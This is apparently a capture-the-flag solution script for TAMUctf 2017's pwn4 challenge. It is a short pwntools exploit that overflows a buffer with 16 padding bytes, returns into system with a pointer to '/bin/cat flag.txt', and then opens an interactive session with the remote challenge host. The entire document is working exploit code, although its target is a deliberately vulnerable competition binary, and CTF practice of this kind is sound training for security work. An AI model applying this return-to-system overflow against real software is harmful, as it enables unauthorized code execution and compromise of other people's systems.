## Solution for TAMUctf 2017 : pwn200-pwn4
# @author intrd - http://dann.com.br/ 
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

from pwn import *

r = remote('web.ctf.tamu.edu', 4324)
elf = ELF('./pwn4')

payload = "A"*16
payload += p32(0x80484d9) #system
payload += p32(0x804a028) #/bin/cat flag.txt
payload += "AAAA"

r.sendline(payload)
r.interactive()